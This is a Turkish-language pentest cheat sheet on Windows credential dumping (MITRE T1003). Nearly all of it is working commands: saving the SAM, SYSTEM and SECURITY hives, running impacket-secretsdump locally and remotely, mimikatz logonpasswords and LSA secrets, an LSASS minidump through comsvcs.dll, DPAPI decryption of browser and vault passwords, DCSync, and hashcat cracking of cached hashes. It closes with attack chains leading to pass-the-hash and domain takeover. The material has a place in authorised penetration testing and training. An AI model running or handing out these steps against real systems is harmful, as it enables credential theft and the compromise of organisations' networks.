Windows Credential Dumping
MITRE ATT&CK · T1003 phase: credential-access
Yerel admin / SYSTEM elde edildikten sonra Windows kimlik mağazaları boşaltılır: SAM (yerel hesap hash’leri), LSA Secrets (servis hesapları, otomatik logon), DPAPI blob’ları ve LSASS belleği. Domain ortamında bunlar yanal hareket ve LSASS / DCSync zincirine bağlanır.
Ön koşullar
Section titled “Ön koşullar”- Local admin veya SYSTEM (çoğu teknik)- SeBackupPrivilege / SeDebugPrivilege bazı yollarda yeterli- Hedef: NT hash, cleartext, DPAPI masterkey, ticketSAM — yerel hesap hash’leri
Section titled “SAM — yerel hesap hash’leri”SAM veritabanı yerel kullanıcı NT hash’lerini tutar. SYSTEM + SAM hive’ları birlikte gerekir.
reg save HKLM\SAM C:\Users\Public\SAMreg save HKLM\SYSTEM C:\Users\Public\SYSTEMreg save HKLM\SECURITY C:\Users\Public\SECURITYimpacket-secretsdump -sam SAM -system SYSTEM LOCALimpacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCALUzaktan (admin + share):
impacket-secretsdump domain/admin:Pass@10.10.10.20impacket-secretsdump -hashes :NTHASH administrator@10.10.10.20nxc smb 10.10.10.20 -u admin -H NTHASH --samsecretsdump · remote
embedded toolimpacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.20secretsdump · remote
Section titled “secretsdump · remote”Volume Shadow Copy / esentutl ile offline kopya da alınabilir; özet için
reg save yeterli.
LSA Secrets
Section titled “LSA Secrets”HKLM\SECURITY\Policy\Secrets altında servis hesabı parolaları, default
logon, DPAPI machine key parçaları bulunur. secretsdump SECURITY hive ile
birlikte LSA’yı çözer.
reg save HKLM\SECURITY C:\Users\Public\SECURITYimpacket-secretsdump -security SECURITY -system SYSTEM LOCAL# mimikatz (SYSTEM)privilege::debugsekurlsa::logonpasswordslsadump::secretslsadump::samnxc smb 10.10.10.20 -u admin -H NTHASH --lsaAutologon registry (düşük gürültü, bazen cleartext):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserNamereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPasswordDPAPI — kullanıcı / makine sırları
Section titled “DPAPI — kullanıcı / makine sırları”Tarayıcı parolaları, Credential Manager, RDP kaydı, Wi-Fi profili DPAPI ile korunur. Derin teknikler: DPAPI.
dir /a %APPDATA%\Microsoft\Protectdir /a %APPDATA%\Microsoft\Credentialsdir /a "%LOCALAPPDATA%\Google\Chrome\User Data\Default"impacket-dpapi masterkey -file masterkey -sid S-1-5-21-... -password 'UserPass'impacket-dpapi credential -file credblob -key 0x...Domain’de DA ile backup key → tüm kullanıcı masterkey’leri:
impacket-dpapi backupkeys -t domain/admin:Pass@DCLSASS (köprü)
Section titled “LSASS (köprü)”Bellekten parola/hash/ticket — ayrı sayfa:
Kısa hatırlatma:
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Users\Public\l.dmp fullnxc smb 10.10.10.20 -u admin -H NTHASH -M lsassyCredential Guard açıksa klasik cleartext/LSASS secret kısıtlanır; SAM/LSA, ticket ve DPAPI yollarına kay.
Credential Manager & cached logons
Section titled “Credential Manager & cached logons”cmdkey /listvaultcmd /listcreds:"Windows Credentials" /all# Domain cached credentials (DCC2) — SYSTEM + SECURITY# secretsdump çıktısında mscash / DCC2 satırlarıhashcat -m 2100 dcc2.hash rockyou.txtNTDS / domain (köprü)
Section titled “NTDS / domain (köprü)”DC’de veya DA ile:
impacket-secretsdump -just-dc domain/admin:Pass@10.10.10.5Metodoloji
Section titled “Metodoloji”-
Yerel admin/SYSTEM doğrula (
whoami/net localgroup administrators). -
SAM+SYSTEM (+SECURITY) kaydet veya uzaktan secretsdump.
-
LSA secrets ve Autologon cleartext tara.
-
Oturum varsa LSASS; kullanıcı sırları için DPAPI.
-
Hash’lerle PtH / spray / lateral — Pass-the-Hash.
Saldırı zinciri
Section titled “Saldırı zinciri”local admin → reg save SAM/SYSTEM → secretsdump LOCAL → local admin hash → PtH → başka hostlarSYSTEM → lsadump::secrets → servis hesabı cleartext → SQL/backup lateralHasSession DA + local admin → LSASS dump → DA hash/ticket → DCSyncUser password biliniyor → DPAPI masterkey → Chrome passwords → vault / RDP creds